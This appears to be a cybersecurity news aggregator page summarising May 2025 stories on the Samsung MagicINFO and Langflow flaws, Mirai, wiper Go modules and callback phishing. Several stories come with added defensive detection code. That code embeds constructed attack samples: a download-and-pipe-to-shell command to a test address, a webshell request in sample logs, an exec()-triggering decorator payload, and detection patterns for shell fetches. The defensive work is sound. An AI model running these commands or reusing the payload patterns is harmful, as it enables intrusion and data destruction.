Daily Brief


Total articles found: 12779

Checks for new stories every ~15 minutes

2025-05-06 17:15:07 bleepingcomputer MALWARE Hackers Exploit Samsung Server Flaw to Deploy Malware
Hackers are exploiting CVE-2024-7399, a remote code execution vulnerability in Samsung MagicINFO 9 Server, to hijack devices and deploy malware. MagicINFO Server is the central management system for Samsung digital signage, widely used in sectors such as retail and healthcare to push multimedia content to displays. The vulnerability, disclosed and patched in August 2024, stems from insufficient restrictions on file uploads: an attacker can upload a malicious .jsp file and then execute operating system commands by requesting it through the web interface, as a recently published proof-of-concept demonstrates. Arctic Wolf has observed active exploitation since the proof-of-concept was released and expects targeting to continue because the flaw is easy to exploit. A variant of the Mirai botnet has also been seen leveraging the vulnerability to take over affected servers. Administrators should update to version 21.1050 or later without delay.
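An added detection example, not from the BleepingComputer article or from Arctic Wolf: the upload-then-execute pattern described above leaves a characteristic trace in web server access logs, namely a POST to an upload endpoint carrying a directory traversal sequence, followed shortly by a request for a .jsp file that had never been served before. The Python below parses combined-format log lines and flags both indicators. The endpoint name /MagicInfo/upload, the client addresses and the log lines are constructed placeholders, not MagicINFO's real servlet path, and the "upload" substring match is a heuristic to be replaced with the real endpoint in production.

```python
import re
from datetime import datetime, timedelta
from urllib.parse import unquote

# Combined log format: ip - - [time] "METHOD path HTTP/x" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

# Constructed sample log. The upload endpoint name (/MagicInfo/upload) is a placeholder,
# not the real servlet path; 203.0.113.9 is a TEST-NET address standing in for an attacker.
SAMPLE_LOG = [
    '10.0.0.5 - - [06/May/2025:10:00:01 +0000] "GET /MagicInfo/login.jsp HTTP/1.1" 200 1234 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [06/May/2025:10:05:10 +0000] "POST /MagicInfo/upload?fileName=..%2F..%2Fshell.jsp HTTP/1.1" 200 12 "-" "python-requests/2.31"',
    '203.0.113.9 - - [06/May/2025:10:05:12 +0000] "GET /MagicInfo/shell.jsp?cmd=id HTTP/1.1" 200 88 "-" "python-requests/2.31"',
    '10.0.0.5 - - [06/May/2025:10:06:00 +0000] "GET /MagicInfo/login.jsp HTTP/1.1" 200 1234 "-" "Mozilla/5.0"',
]


def parse(line):
    """Parse one combined-format line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    e = m.groupdict()
    e["ts"] = datetime.strptime(e["ts"], TS_FMT)
    # Decode twice so "..%2F" and double-encoded "..%252F" both surface as "../"
    e["path"] = unquote(unquote(e["path"]))
    e["status"] = int(e["status"])
    return e


def detect(lines, window=timedelta(minutes=10)):
    """Return (indicator, client_ip, path) tuples for two indicators:
    'traversal'      - a decoded request URI containing a directory traversal sequence;
    'webshell_fetch' - a .jsp nobody requested before is fetched (HTTP 200) by a client
                       that POSTed to an upload endpoint within `window` (drop-then-call).
    """
    alerts = []
    seen_jsp = set()   # .jsp paths requested by anyone so far (crude baseline of known pages)
    uploads = {}       # client ip -> timestamps of its POSTs to upload endpoints
    for e in filter(None, map(parse, lines)):
        path = e["path"]
        low = path.lower()
        if "../" in low or "..\\" in low:
            alerts.append(("traversal", e["ip"], path))
        if e["method"] == "POST" and "upload" in low:   # endpoint-name match is a heuristic
            uploads.setdefault(e["ip"], []).append(e["ts"])
            continue
        base = low.split("?", 1)[0]
        if base.endswith(".jsp"):
            recent = [t for t in uploads.get(e["ip"], []) if timedelta(0) <= e["ts"] - t <= window]
            if recent and base not in seen_jsp and e["status"] == 200:
                alerts.append(("webshell_fetch", e["ip"], path))
            seen_jsp.add(base)
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG):
        print(*alert)
```

The baseline of known .jsp pages is built from the log itself, so run it over a window that starts well before the suspected intrusion; a legitimate administrator who uploads content and then opens a page nobody had visited before will also trip the second rule, which is acceptable for a hunt query but worth tuning before alerting on it.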
2025-05-06 16:24:30 bleepingcomputer DATA BREACH UK Legal Aid Agency Faces Potential Data Compromise Incident
The UK Legal Aid Agency (LAA) has reported a cybersecurity incident that may have exposed financial records. Law firms that work with the LAA were alerted that their payment information may have been compromised; around 2,000 legal aid providers in England and Wales could be affected. The National Crime Agency and the National Cyber Security Centre (NCSC) are assisting the Ministry of Justice (MoJ), the LAA's parent department, with the investigation. The notification comes amid a run of high-profile cyberattacks on major UK retailers, suggesting a broader pattern of targeted operations in the region. The LAA is still assessing the extent of the incident and has put measures in place to limit further risk, and the NCSC has urged all UK businesses to strengthen their cybersecurity in response to recent events.
2025-05-06 16:09:38 bleepingcomputer CYBERCRIME Critical RCE Vulnerability in Langflow AI App Servers Exploited
CISA has confirmed that CVE-2025-3248, a remote code execution vulnerability in Langflow, is being actively exploited, and is urging users to apply security updates. The flaw lets unauthenticated remote attackers take control of affected Langflow servers through an API endpoint that runs user-supplied input without checking who sent it. Langflow is a widely used open-source tool for building AI workflows. The vulnerability was fixed in Langflow version 1.3.0, and users are advised to upgrade. Horizon3 researchers have published a technical analysis of the flaw, noting at least 500 internet-exposed instances, along with a proof-of-concept exploit. CISA requires federal agencies to update or otherwise secure their Langflow installations by May 26, 2025, or stop using the software. Those who cannot upgrade immediately should limit the servers' network exposure, for example by placing them behind a firewall or VPN rather than exposing them directly to the internet. The latest release, Langflow 1.4.0, includes numerous additional fixes.
2025-05-06 15:39:49 thehackernews DDOS Hackers Utilize IoT Flaws in Mirai Botnet Deployment for DDoS Attacks
Threat actors are exploiting command injection flaws in obsolete GeoVision IoT devices to build a Mirai botnet that is used for distributed denial-of-service (DDoS) attacks; Akamai SIRT first detected the activity in April 2025. The same campaign targets a path traversal vulnerability in Samsung MagicINFO 9 Server, patched in August 2024, to deploy Mirai. Akamai notes that outdated firmware on older devices that will never receive patches is a major enabler of such attacks. Other exploited vulnerabilities include high-severity flaws in Hadoop YARN and a previously identified issue in DigiEver devices. Arctic Wolf recommends updating Samsung MagicINFO to version 21.1050 or later to mitigate the risk. Evidence links the activity to the known "InfectedSlurs" campaign, underscoring how cybercriminal operators reuse tactics and tools.
2025-05-06 14:05:59 bleepingcomputer MISCELLANEOUS How EASM Enhances Digital Risk Protection and Cyber Resilience
Modern organizations struggle to secure their public-facing assets because of factors such as shadow IT and third-party exposure. External Attack Surface Management (EASM) is increasingly important for finding and mitigating those exposures and for building digital resilience. EASM helps security teams map and understand complex attack surfaces, particularly in hybrid environments, and provides the continuous visibility needed for proactive threat detection and risk prioritization. Digital Risk Protection (DRP) complements EASM by identifying threats across an organization's wider digital footprint, including social media and the deep web. Integrating EASM into a DRP strategy should involve regular assessments, collaboration across departments, continuous improvement, and careful vendor selection. The piece highlights Outpost24's EASM solution, which combines cyber threat intelligence with attack surface management.
2025-05-06 13:38:01 thehackernews CYBERCRIME Facebook Ads and RDGA Domains Facilitate Sophisticated Investment Scams
Cybersecurity researchers have identified two groups, Reckless Rabbit and Ruthless Rabbit, that use Facebook ads with fake celebrity endorsements to promote investment scams. The operators route clicks through Traffic Distribution Systems to filter and manage incoming traffic, improving the yield of their schemes. Victims are profiled through web forms, after which HTTP GET requests validate their geography and contact details; those who pass the screening are sent to platforms where they are persuaded to transfer funds or enter financial data. Reckless Rabbit targets users in specific Eastern European countries and uses registered domain generation algorithms (RDGAs) to mint large numbers of credible-looking but fake platform domains. Call centers guide victims through the money transfer process, adding to the scam's perceived legitimacy. U.S. and European authorities are taking action against similar operations, and recent arrests in Spain, alongside escalating scam activity worldwide, underline how persistent and adaptive these social media driven cybercrimes are.
2025-05-06 13:38:00 bleepingcomputer MALWARE Google Patches Critical Zero-Day Flaw in FreeType on Android
Google has issued Android security updates addressing 45 vulnerabilities, including an actively exploited flaw in the FreeType 2 font rendering library. The vulnerability, CVE-2025-27363, is an out-of-bounds write triggered when parsing certain TrueType font files and allows arbitrary code execution; it affects FreeType versions 2.13.0 and earlier. Facebook security researchers reported the bug in March 2025 and noted that it may have been exploited in targeted attacks. The May 2025 bulletin also covers high-severity issues in Android's Framework, System, Google Play, and Kernel components, along with components from MediaTek, Qualcomm, Arm, and Imagination Technologies. The updates apply to Android 13, 14, and 15; older versions such as Android 12 are no longer supported and do not receive fixes directly, although Google Play system updates may offer partial mitigation. Users on unsupported versions are advised to move to a maintained third-party distribution or a newer device.
2025-05-06 11:27:56 thehackernews DATA BREACH Identifying Third-Party and Machine Credentials as Major Security Risks
The 2025 Verizon Data Breach Investigations Report highlights significant breaches driven by third-party exposure and machine credential abuse. Incidents linked to third parties doubled in one year, emphasizing the need for robust management of non-employee identities. Machine identities, such as service accounts and bots, are rapidly increasing and becoming prime targets for attackers due to poor oversight. Traditional security tools are insufficient for the growing complexity and scale of managing both human and machine identities in a unified way. SailPoint offers solutions that address these complex challenges by providing an enterprise-scale identity security platform that includes machine identities management. Organizations are advised to adopt a unified approach to identity governance to protect against vulnerabilities and enhance security across all user types. The DBIR urges businesses to extend identity security practices to encompass contractors, partners, and machine entities to avoid potential breaches.
2025-05-06 11:10:59 thehackernews MISCELLANEOUS Microsoft Highlights Security Risks in Kubernetes Deployments
Microsoft has warned about security weaknesses that come from deploying Kubernetes applications with default Helm charts. Helm charts simplify deployment, but their default settings often favor convenience over security, producing misconfigurations that can expose sensitive data, cloud resources, or entire environments to attack. The main weaknesses are services exposed to the internet without adequate network controls and workloads that lack sufficient authentication or authorization. Microsoft's research team advises reviewing and adjusting the configuration in Helm charts and YAML manifests against security best practices, scanning publicly facing interfaces regularly, and monitoring container activity on an ongoing basis to detect and mitigate threats. The issue matters because many compromises of containerized applications start from exactly these default or neglected configurations.
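An added example, not code from Microsoft's research or from the Helm project: the review of rendered chart output that the summary recommends can be partly automated. The Python below lints a list of Kubernetes objects for the weaknesses named above (a Service reachable from outside the cluster, no NetworkPolicy in its namespace, and pod-level settings such as hostNetwork, privileged containers, or a missing runAsNonRoot) and shows a weak manifest beside its corrected form. Both manifests are constructed and written as JSON, which Kubernetes accepts interchangeably with YAML; the names, namespace and image are placeholders, and in practice the input would be the output of `helm template`.

```python
import json

# Constructed manifests (placeholders). Left: typical convenience defaults. Right: hardened.
WEAK = json.loads("""[
 {"kind": "Service", "metadata": {"name": "app", "namespace": "demo"},
  "spec": {"type": "LoadBalancer", "ports": [{"port": 80}]}},
 {"kind": "Deployment", "metadata": {"name": "app", "namespace": "demo"},
  "spec": {"template": {"spec": {"hostNetwork": true,
    "containers": [{"name": "app", "image": "example/app:1.0",
                    "securityContext": {"privileged": true}}]}}}}
]""")

HARDENED = json.loads("""[
 {"kind": "Service", "metadata": {"name": "app", "namespace": "demo"},
  "spec": {"type": "ClusterIP", "ports": [{"port": 80}]}},
 {"kind": "Deployment", "metadata": {"name": "app", "namespace": "demo"},
  "spec": {"template": {"spec": {
    "containers": [{"name": "app", "image": "example/app:1.0",
                    "securityContext": {"runAsNonRoot": true, "privileged": false,
                                        "allowPrivilegeEscalation": false}}]}}}},
 {"kind": "NetworkPolicy", "metadata": {"name": "app-ingress", "namespace": "demo"},
  "spec": {"podSelector": {}, "policyTypes": ["Ingress"],
           "ingress": [{"from": [{"namespaceSelector": {"matchLabels": {"name": "ingress"}}}]}]}}
]""")

# Workload kinds whose pod template sits at spec.template.spec (CronJob nests it deeper and is skipped)
WORKLOADS = ("Deployment", "StatefulSet", "DaemonSet", "Job")


def lint(objects):
    """Return (object, finding) pairs for the default-chart weaknesses discussed above."""
    findings = []
    policy_ns = {o["metadata"].get("namespace", "default")
                 for o in objects if o.get("kind") == "NetworkPolicy"}
    for o in objects:
        kind, meta, spec = o.get("kind"), o.get("metadata", {}), o.get("spec", {})
        ident = f"{kind}/{meta.get('name')}"
        ns = meta.get("namespace", "default")
        if kind == "Service":
            if spec.get("type") in ("LoadBalancer", "NodePort"):
                findings.append((ident, f"reachable from outside the cluster (type={spec['type']})"))
                if ns not in policy_ns:
                    findings.append((ident, f"no NetworkPolicy in namespace '{ns}' limits who can reach it"))
        elif kind in WORKLOADS:
            pod = spec.get("template", {}).get("spec", {})
            if pod.get("hostNetwork"):
                findings.append((ident, "hostNetwork: true shares the node's network namespace"))
            for c in pod.get("containers", []):
                sc = c.get("securityContext", {})
                cname = c.get("name", "?")
                if sc.get("privileged"):
                    findings.append((ident, f"container '{cname}' runs privileged"))
                if not sc.get("runAsNonRoot"):
                    findings.append((ident, f"container '{cname}' does not set runAsNonRoot: true"))
                if sc.get("allowPrivilegeEscalation", True):   # Kubernetes defaults this to true
                    findings.append((ident, f"container '{cname}' allows privilege escalation"))
    return findings


if __name__ == "__main__":
    for label, objs in (("weak", WEAK), ("hardened", HARDENED)):
        print(label, "->", lint(objs) or "no findings")
```

The exposure check is deliberately conservative: a ClusterIP Service fronted by an Ingress is still reachable from outside, so in a real pipeline the Ingress objects and their authentication annotations need a rule of their own, which is where the chart's authentication defaults, the second weakness the summary names, would be checked.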
2025-05-06 10:04:58 thehackernews MISCELLANEOUS Essential Strategies for Backing Up Microsoft Entra ID
Microsoft Entra ID is critical to identity management in business and is heavily targeted, with Microsoft reporting more than 600 million attacks per day. Despite built-in protections such as multifactor authentication and conditional access, gaps remain in Entra ID's native safeguards, and breaches cause significant disruption, including downtime, failed audits, and reputational damage. Under Microsoft's shared responsibility model the customer is responsible for backing up its own data, which makes a dedicated backup strategy important. Limitations in the native recovery tools, such as the Recycle Bin's short retention period, underscore the need for a robust backup solution. An effective strategy should match the organization's risk profile, balancing protection against cost and available resources, so that the business can recover quickly and keep operating when an incident occurs. The piece presents Veeam Data Cloud as a way to address the limitations of native Entra ID protection.
2025-05-06 09:15:03 bleepingcomputer MALWARE Linux Servers Targeted by Wiper Malware in Supply-Chain Attack
Researchers have identified a supply-chain attack that uses malicious Go modules hosted on GitHub to target Linux servers. Three modules contain obfuscated code that, after confirming it is running on Linux, retrieves a remote Bash script named done.sh and executes it immediately, leaving defenders almost no time to react. The script uses dd to overwrite all data on the primary storage volume, /dev/sda, causing irreversible data loss and system failure. The malicious modules impersonated legitimate projects, raising the odds that developers would pull them into their applications. The Go ecosystem's decentralized design, in which module paths resolve straight to repositories with no central vetting, makes it easy to publish a convincingly named imitation. GitHub has since removed the identified modules.
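An added example, not code from the researchers' report or from any real module: the three behaviours the summary describes (an OS gate, a command rebuilt from obfuscated bytes, and a remote script piped into a shell) can be hunted for in dependency source before it is built. The Python below decodes Go `[]byte{...}` integer literals back into strings and matches indicator patterns against the source and the decoded strings together, so an obfuscated download-and-execute command is caught in the clear. Both Go snippets are constructed samples; the URL uses a TEST-NET address and the patterns are heuristics, not the actual modules' code.

```python
import re

# Constructed sample of the shape described above: an init() that runs only on Linux,
# rebuilds a shell command from a byte array, and pipes a remote script into sh.
# 203.0.113.10 is a TEST-NET address; the package name and URL are placeholders.
SAMPLE_CMD = "wget -qO- http://203.0.113.10/done.sh | sh"
SAMPLE_GO = """package util

import (
    "os/exec"
    "runtime"
)

func init() {
    if runtime.GOOS != "linux" {
        return
    }
    cmd := string([]byte{BYTES})
    exec.Command("/bin/sh", "-c", cmd).Start()
}
""".replace("BYTES", ", ".join(str(b) for b in SAMPLE_CMD.encode()))

# Constructed benign module: runs a subprocess, but no fetch, no shell, no OS gate, no obfuscation.
BENIGN_GO = """package util

import "os/exec"

func GitStatus() ([]byte, error) {
    return exec.Command("git", "status", "--porcelain").Output()
}
"""

BYTES_RE = re.compile(r"\[\]byte\{([0-9,\s]+)\}")
INDICATORS = {
    # gate on the target OS before doing anything destructive
    "os_gate": re.compile(r'runtime\.GOOS\s*[!=]=\s*"linux"'),
    # hand a string to a shell interpreter
    "shell_exec": re.compile(r'exec\.Command\(\s*"(?:/bin/)?(?:sh|bash)"\s*,\s*"-c"'),
    # fetch a remote script and pipe it straight into a shell, or fetch it over HTTP in-process
    "remote_fetch": re.compile(r'\b(?:wget|curl)\b[^"\n]*\|\s*(?:sh|bash)\b|http\.Get\('),
}


def decode_byte_literals(src):
    """Turn every []byte{...} literal made of integers into the string it encodes."""
    out = []
    for m in BYTES_RE.finditer(src):
        nums = [int(x) for x in m.group(1).split(",") if x.strip()]
        if nums and all(0 <= n < 256 for n in nums):
            out.append(bytes(nums).decode("latin-1"))
    return out


def scan(src):
    """Match indicators against the source plus its decoded byte strings.
    Returns indicator -> bool."""
    decoded = decode_byte_literals(src)
    text = src + "\n" + "\n".join(decoded)
    hits = {name: bool(rx.search(text)) for name, rx in INDICATORS.items()}
    hits["byte_obfuscation"] = any(len(s) >= 16 for s in decoded)   # long strings hidden as numbers
    return hits


def is_suspicious(src):
    """Download-and-execute through a shell is the core signal; the OS gate and the
    obfuscation raise confidence but are not required, since not every sample uses them."""
    h = scan(src)
    return h["shell_exec"] and h["remote_fetch"]


if __name__ == "__main__":
    print("sample:", scan(SAMPLE_GO), "suspicious:", is_suspicious(SAMPLE_GO))
    print("benign:", scan(BENIGN_GO), "suspicious:", is_suspicious(BENIGN_GO))
```

Run this over the module cache (`$GOPATH/pkg/mod`) or over `go mod vendor` output rather than over the repository you think you depend on, because the impersonation described above means the module path in go.mod, not the project name, decides what gets compiled in.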
2025-05-06 05:51:57 thehackernews MALWARE Google Patches Android Vulnerability Exploited in the Wild
Google's May 2025 Android security update fixes 46 vulnerabilities, including one exploited in the wild. That flaw, CVE-2025-27363, is a high-severity vulnerability in the System component that allows local code execution without any additional execution privileges. It stems from an out-of-bounds write in the FreeType font rendering library when processing TrueType and variable font files. Facebook reported the bug in March 2025, and it was actively exploited before the update shipped. Google fixed it by moving to a FreeType version above 2.13.0. The update also addresses further issues in the Android System and Framework that could lead to privilege escalation, data leaks, or service disruption. Google notes that security improvements in newer Android versions make exploitation harder and urges users to update their devices.
2025-05-06 04:30:53 thehackernews MALWARE Critical Flaw in Langflow Added to CISA KEV for Active Exploits
A critical security flaw in the Langflow platform, CVE-2025-3248, has been added to CISA's Known Exploited Vulnerabilities catalog on evidence of active exploitation. The flaw carries a CVSS score of 9.8 and lets remote, unauthenticated attackers execute arbitrary code through the /api/v1/validate/code endpoint, which passes user-supplied code to Python's exec() without requiring authentication or applying any other safeguard, so anyone who can reach the endpoint can run commands on the server. Multiple Langflow versions are affected; the fix shipped in version 1.3.0, released on March 31, 2025. Researchers at Horizon3.ai discovered and reported the vulnerability, describing it as "easily exploitable" and capable of giving an attacker full control of the server. A proof-of-concept exploit was published on April 9, 2025, adding to the urgency of patching. Over 400 internet-exposed Langflow instances have been identified, mostly in the US, Germany, Singapore, India, and China. CISA requires Federal Civilian Executive Branch agencies to patch by May 26, 2025.
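An added example covering both Langflow entries above (this one and the CISA advisory entry earlier on the page); it is illustrative Python, not Langflow's own code. It shows why "validating" code with exec() is remote code execution: a decorator expression runs the moment the interpreter reaches the def, so a syntactically valid component definition can carry a payload that fires during validation. The hardened version checks syntax with ast.parse, which builds a tree without evaluating anything, and sits behind an authentication check, since even a parse-only endpoint should not be reachable anonymously. The payload, the environment-variable marker it sets and the API key are constructed for the demo.

```python
import ast
import hmac
import os
import secrets

MARKER = "LANGFLOW_DEMO_PWNED"   # environment variable the demo payload sets when it runs

# Constructed payload: valid code whose decorator executes at definition time. A decorator
# is evaluated as soon as the def is reached, so exec()-based "validation" runs run() here.
PAYLOAD = (
    "def run(f):\n"
    f"    __import__('os').environ['{MARKER}'] = '1'\n"
    "    return f\n"
    "\n"
    "@run\n"
    "def component():\n"
    "    return 'looks harmless'\n"
)


def validate_code_unsafe(code: str) -> dict:
    """Vulnerable pattern (illustrative, not Langflow's code): checking code by executing it.
    Module-level statements, decorators and default-argument expressions all run here."""
    ns = {}
    try:
        exec(compile(code, "<user>", "exec"), ns)
    except SyntaxError as err:
        return {"valid": False, "error": str(err)}
    funcs = [k for k, v in ns.items() if callable(v) and not k.startswith("__")]
    return {"valid": True, "functions": funcs}


def validate_code_safe(code: str) -> dict:
    """Hardened: parse only. ast.parse never evaluates expressions, so decorators and
    defaults stay inert, and the caller still gets the same list of defined functions."""
    try:
        tree = ast.parse(code)
    except SyntaxError as err:
        return {"valid": False, "error": str(err)}
    funcs = [n.name for n in tree.body if isinstance(n, (ast.FunctionDef, ast.AsyncFunctionDef))]
    return {"valid": True, "functions": funcs}


API_KEY = secrets.token_hex(16)   # hypothetical server-side secret; real deployments load it from config


def handle_validate(code: str, presented_key, validator=validate_code_safe) -> dict:
    """Authenticated wrapper: constant-time key comparison, 401 before any parsing happens."""
    if presented_key is None or not hmac.compare_digest(str(presented_key), API_KEY):
        return {"status": 401}
    return {"status": 200, **validator(code)}


def marker_set() -> bool:
    """True if the demo payload has executed in this process."""
    return os.environ.get(MARKER) == "1"


def reset_marker() -> None:
    os.environ.pop(MARKER, None)


if __name__ == "__main__":
    reset_marker()
    print("safe:  ", validate_code_safe(PAYLOAD), "payload ran:", marker_set())
    print("unsafe:", validate_code_unsafe(PAYLOAD), "payload ran:", marker_set())
```

Two points carry over to any "run user code" feature: syntax validation never needs execution, and when execution is genuinely required it belongs in a separate sandboxed worker, not the API process that holds the server's credentials.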
2025-05-06 00:22:25 theregister NATION STATE ACTIVITY Trump Proposes Major Budget Cut to Cybersecurity Agency, CISA
President Trump's 2026 budget proposal recommends a $491 million cut for the Cybersecurity and Infrastructure Security Agency (CISA), a 17% reduction from its current funding. The proposed budget cuts are part of Trump's critique of CISA’s focus on countering online misinformation and election security, which he terms the "censorship industrial complex." In contrast to CISA's reduced funding, the Department of Homeland Security would receive a significant budget increase, specifically for enhancing border security and immigration enforcement. The criticism of CISA includes allegations of violating free speech by focusing on misinformation and self-promotion rather than protecting critical infrastructure. The budget proposal also contains financial reductions for other security agencies, including TSA and FEMA, citing reasons related to political bias and inefficiency. Trump has historically challenged the legitimacy of his election loss in 2020, influencing his stance on CISA's operations. Although a contentious proposal, it faces substantial challenges in Congress, with significant opposition expected, particularly regarding cuts to cybersecurity funding.
2025-05-05 22:26:21 bleepingcomputer CYBERCRIME Luna Moth Hackers Mimic IT Help Desks to Target U.S. Firms
Luna Moth, also known as Silent Ransom Group, has stepped up data theft and extortion attacks against U.S. legal and financial firms. The group relies on callback phishing, gaining remote access through social engineering rather than deploying ransomware. Attackers register domains through GoDaddy that mimic the IT support of major U.S. law and financial firms, then email victims with fake helpdesk numbers; callers are talked into installing remote monitoring and management (RMM) software, which gives the attackers direct access to their systems. The tools abused include legitimate RMM products such as Syncro, SuperOps, Zoho Assist, Atera, AnyDesk, and Splashtop, which are unlikely to be flagged as threats. Once inside, the attackers move through the network, locate and exfiltrate valuable data, and threaten to publish it unless a ransom is paid. EclecticIQ's report recommends adding the published indicators of compromise to blocklists and restricting the use of unapproved RMM tools.
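An added detection example, not from the EclecticIQ report: the "restrict unapproved RMM tools" advice above turns into a simple process-creation rule. The Python below classifies events against the RMM families named in the summary and alerts when the tool is not on the organization's approved list, was launched from a user-writable path, or was spawned by a browser or mail client, which is how a victim who followed a fake helpdesk call would install it. The events are constructed in Sysmon Event ID 1 style, the approved list (Atera only) is hypothetical, and the family match is a substring heuristic because exact binary names vary between product versions.

```python
import csv
import io
import re

# RMM families named in the report, keyed by a normalized token searched for in the
# image path and command line (exact binary names vary by version, so this is a heuristic).
RMM_FAMILIES = {
    "syncro": "Syncro", "superops": "SuperOps", "zohoassist": "Zoho Assist",
    "atera": "Atera", "anydesk": "AnyDesk", "splashtop": "Splashtop",
}
APPROVED = {"Atera"}     # hypothetical: the one RMM product this organization sanctions
USER_WRITABLE = ("\\downloads\\", "\\temp\\", "\\public\\")
LURE_PARENTS = ("chrome.exe", "msedge.exe", "firefox.exe", "outlook.exe")

# Constructed process-creation events (Sysmon Event ID 1 style); hosts, users and paths invented.
EVENTS = r"""timestamp,host,user,parent_image,image,command_line
2025-05-05T14:02:11Z,WS01,svc_it,C:\Windows\System32\services.exe,C:\Program Files\Atera Networks\AteraAgent\AteraAgent.exe,AteraAgent.exe
2025-05-05T14:10:45Z,WS17,jdoe,C:\Program Files\Google\Chrome\Application\chrome.exe,C:\Users\jdoe\Downloads\AnyDesk.exe,AnyDesk.exe
2025-05-05T14:12:03Z,WS22,asmith,C:\Windows\explorer.exe,C:\Users\asmith\AppData\Local\Temp\SplashtopStreamer.exe,SplashtopStreamer.exe /silent
2025-05-05T14:13:30Z,WS22,asmith,C:\Windows\explorer.exe,C:\Windows\System32\notepad.exe,notepad.exe
"""


def classify(image, command_line):
    """Return the RMM family name if the event looks like one of the listed tools, else None."""
    hay = re.sub(r"[^a-z0-9]", "", (image + " " + command_line).lower())
    for token, family in RMM_FAMILIES.items():
        if token in hay:
            return family
    return None


def detect(csv_text, approved=APPROVED):
    """Flag RMM launches that are unapproved, dropped in a user-writable path, or spawned
    by a browser/mail client, the install path a callback-phishing victim follows."""
    alerts = []
    for row in csv.DictReader(io.StringIO(csv_text)):
        family = classify(row["image"], row["command_line"])
        if family is None:
            continue
        image = row["image"].lower()
        parent = row["parent_image"].lower().rsplit("\\", 1)[-1]
        reasons = []
        if family not in approved:
            reasons.append("unapproved RMM tool")
        if any(p in image for p in USER_WRITABLE):
            reasons.append("launched from a user-writable path")
        if parent in LURE_PARENTS:
            reasons.append(f"spawned by {parent}")
        if reasons:
            alerts.append({"host": row["host"], "user": row["user"], "tool": family, "reasons": reasons})
    return alerts


if __name__ == "__main__":
    for alert in detect(EVENTS):
        print(alert)
```

The approved-tool row on WS01 produces nothing because it matches the sanctioned product, runs from Program Files and is started by the service control manager; the same rule with an empty approved set would flag it too, which is the quickest way to inventory every RMM agent in the estate before deciding what to allow.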